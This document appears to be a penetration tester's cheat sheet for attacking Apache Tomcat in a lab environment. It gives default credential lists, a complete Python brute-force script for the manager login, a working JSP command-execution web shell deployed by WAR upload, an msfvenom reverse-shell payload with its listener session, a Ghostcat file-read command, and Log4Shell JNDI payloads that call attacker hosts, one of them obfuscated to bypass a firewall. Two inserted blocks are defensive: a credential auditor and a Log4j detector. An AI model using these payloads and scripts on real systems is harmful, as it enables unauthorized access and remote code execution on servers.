Discovery
http://app-dev.inlanefreight.local:8080/invalid
$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
<SNIP>
Interesting Files
WEB-INF/web.xml
tomcat-users.xml
<SNIP>
<!-- user manager can access only manager section -->
<role rolename="manager-gui"/>
<user username="tomcat" password="tomcat" roles="manager-gui"/>
<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui"/>
<user username="admin" password="admin" roles="manager-gui,admin-gui"/>
</tomcat-users>
Enumeration
gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
Password
tomcat::Tomcatadm
osboxes@osboxes:~$ creds search tomcat
+----------------------------------+------------+------------+
| Product | username | password |
+----------------------------------+------------+------------+
| apache tomcat host manager (web) | admin | admin |
| apache tomcat host manager (web) | ADMIN | ADMIN |
| apache tomcat host manager (web) | admin | <blank> |
| apache tomcat host manager (web) | admin | j5Brn9 |
| apache tomcat host manager (web) | admin | tomcat |
| apache tomcat host manager (web) | cxsdk | kdsxc |
| apache tomcat host manager (web) | j2deployer | j2deployer |
| apache tomcat host manager (web) | ovwebusr | OvW*busr1 |
| apache tomcat host manager (web) | QCC | QLogic66 |
| apache tomcat host manager (web) | role1 | role1 |
| apache tomcat host manager (web) | role1 | tomcat |
| apache tomcat host manager (web) | role | changethis |
| apache tomcat host manager (web) | root | root |
| apache tomcat host manager (web) | tomcat | changethis |
| apache tomcat host manager (web) | tomcat | s3cret |
| apache tomcat host manager (web) | tomcat | tomcat |
| apache tomcat host manager (web) | xampp | xampp |
+----------------------------------+------------+------------+
cat /opt/tools/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt
j2deployer j2deployer
ovwebusr OvW*busr1
cxsdk kdsxc
root owaspbwa
ADMIN ADMIN
xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis
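Added example (not from the original notes, Metasploit or Tomcat): a defender-side audit that parses a tomcat-users.xml like the one quoted under "Interesting Files" and flags every account whose username/password pair appears in the default wordlist listed above, or that holds a manager/admin role. The sample config and the wordlist subset embedded below are constructed from the snippets on this page; the role names are Tomcat's real manager/admin roles.

```python
import xml.etree.ElementTree as ET
# Constructed sample tomcat-users.xml, modelled on the snippet quoted earlier on this page.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="a9F!q2Lm#7xZ" roles="manager-script"/>
  <user username="reader" password="s3cret" roles="probeuser"/>
</tomcat-users>
"""

# Subset of the tomcat_mgr_default_userpass.txt pairs above: "user password" per line,
# a bare username meaning a blank password.
DEFAULT_PAIRS_TXT = """tomcat tomcat
admin admin
tomcat s3cret
root root
tomcat
admin
"""

# Roles that allow deploying applications or administering hosts; a WAR upload needs one of these.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

def load_default_pairs(text):
    """Parse the wordlist into a set of (username_lowercase, password) tuples."""
    pairs = set()
    for line in text.splitlines():
        parts = line.split(" ", 1)
        pairs.add((parts[0].lower(), parts[1] if len(parts) > 1 else ""))
    return pairs

def audit_tomcat_users(xml_text, default_pairs):
    """One finding per <user> that uses a default credential or holds a privileged role."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":   # tolerate the xmlns-qualified tag name
            continue
        name, pw = elem.get("username", ""), elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        issues = []
        if (name.lower(), pw) in default_pairs:
            issues.append("default credential")
        if roles & PRIVILEGED_ROLES:
            issues.append("privileged roles: " + ",".join(sorted(roles & PRIVILEGED_ROLES)))
        if issues:
            findings.append({"username": name, "issues": issues})
    return findings
```

Run it against a real `conf/tomcat-users.xml` and the full Metasploit wordlist to find accounts that should be removed or rotated before the manager application is reachable from anywhere.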
Tomcat Manager - Login Brute Force
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
mgr_brute.py
#!/usr/bin/env python3
import argparse

import requests
from termcolor import cprint

parser = argparse.ArgumentParser(description="Tomcat manager or host-manager credential bruteforcing")
parser.add_argument("-U", "--url", type=str, required=True, help="URL to tomcat page")
parser.add_argument("-P", "--path", type=str, required=True, help="manager or host-manager URI")
parser.add_argument("-u", "--usernames", type=str, required=True, help="Users File")
parser.add_argument("-p", "--passwords", type=str, required=True, help="Passwords Files")
args = parser.parse_args()

url = args.url
uri = args.path
users_file = args.usernames
passwords_file = args.passwords
new_url = url + uri

# The wordlists are opened in binary mode, so every entry is a bytes object. requests accepts
# bytes for HTTP Basic auth, which is why the output below prints the hits as b'tomcat'.
with open(users_file, "rb") as f_users, open(passwords_file, "rb") as f_pass:
    usernames = [x.strip() for x in f_users]
    passwords = [x.strip() for x in f_pass]

cprint("\n[+] Atacking.....", "red", attrs=['bold'])
found = False
for u in usernames:
    for p in passwords:
        r = requests.get(new_url, auth=(u, p))
        if r.status_code == 200:
            cprint("\n[+] Success!!", "green", attrs=['bold'])
            cprint("[+] Username : {} \n[+] Password : {} ".format(u, p), "green", attrs=['bold'])
            found = True
            break
    if found:
        break

if not found:
    cprint("\n[+] Failed!!", "red", attrs=['bold'])
    cprint("[+] Could not Find the creds :( ", "red", attrs=['bold'])
$ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
[+] Atacking.....
[+] Success!!
[+] Username : b'tomcat'
[+] Password : b'admin'
Tomcat Manager - WAR File Upload
Manually
jsp shell: https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
<%@ page import="java.util.*,java.io.*" %>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp
adding: cmd.jsp (deflated 81%)
In the Tomcat Manager, click Browse to select the .war file and then click on Deploy.
$ curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
</pre>
</BODY></HTML>
Msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 45224
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
Metasploit
multi/http/tomcat_mgr_upload
Exploitation
Web Shell CVE-2024-50379
A Time-of-Check Time-of-Use (TOCTOU) race condition that can lead to remote code execution (RCE) when the server's configuration allows writable directories.
CVE-2024-52316 - Authentication Bypass
Affected versions: versions prior to 10.1.31
CVE-2024-40725 and CVE-2024-40898 - SSRF
Apache HTTP Server versions 2.4.0 through 2.4.61
CVE-2024-52318 - XSS
Apache Tomcat 11.0: versions prior to 11.0.1
Apache Tomcat 10.1: versions prior to 10.1.33
Apache Tomcat 9.0: versions prior to 9.0.97
CVE-2024-52317 - Data Leakage
Apache Tomcat 11.0: versions prior to 11.0.0
Apache Tomcat 10.1: versions prior to 10.1.31
Apache Tomcat 9.0: versions prior to 9.0.96
Ghostcat
nmap -sV -p 8009,8080 app-dev.inlanefreight.local
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
The exploit can only read files and folders within the web apps folder, which means that files like /etc/passwd can't be accessed.
python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
Log4Shell
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} - AWS Firewall Bypass
${jndi:ldap://${env:user}.xyz.collab.com/a} - Default Payload
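Added example, not part of the original notes: detection logic that folds nested Log4j 2 lookups (the `${...:-default}` and `${lower:...}` obfuscation used in the first payload above) back into their evaluated form and reports the JNDI scheme and host from access-log lines, so a naive `jndi:` string match is not bypassed. The log lines below are constructed; the two payload strings are the ones shown above.

```python
import re
# Innermost ${...} lookup: a body containing no nested "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup that survived normalization: capture scheme and host[:port].
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def _resolve_inner(m):
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)                      # keep: this is what we are looking for
    if ":-" in body:                           # ${lookup:key:-default} -> default
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.lower() in ("lower", "upper"):   # ${lower:J} -> J (matching is case-insensitive anyway)
        return rest
    return "<" + body + ">"                    # env/sys/date/...: not resolvable offline, keep a marker

def normalize(s, max_rounds=32):
    """Fold nested lookups from the inside out, the way Log4j 2 evaluates them."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, s)
        if new == s:
            break
        s = new
    return s

def jndi_target(line):
    """Return (scheme, host) if the line still contains a JNDI lookup after normalization."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None

def scan_log(lines):
    """Return [(line_number, scheme, host), ...] for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        target = jndi_target(line)
        if target:
            hits.append((i, target[0], target[1]))
    return hits
# Constructed access-log lines: the two payload shapes from the notes above in User-Agent, plus a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /app/ HTTP/1.1" 200 512 "-" "${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o}"',
    '10.0.0.6 - - [10/Dec/2021:03:14:09 +0000] "GET /app/ HTTP/1.1" 200 512 "-" "${jndi:ldap://${env:user}.xyz.collab.com/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:14:11 +0000] "GET /app/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 ${date:yyyy}"',
]

if __name__ == "__main__":
    for lineno, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} to {host}")
```

The reported host is the outbound LDAP/RMI destination the vulnerable logger would have contacted, which is the value to check against egress logs when triaging.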
Spring4Shell
Tomcat CGI
Tomcat CGI Tools
Resources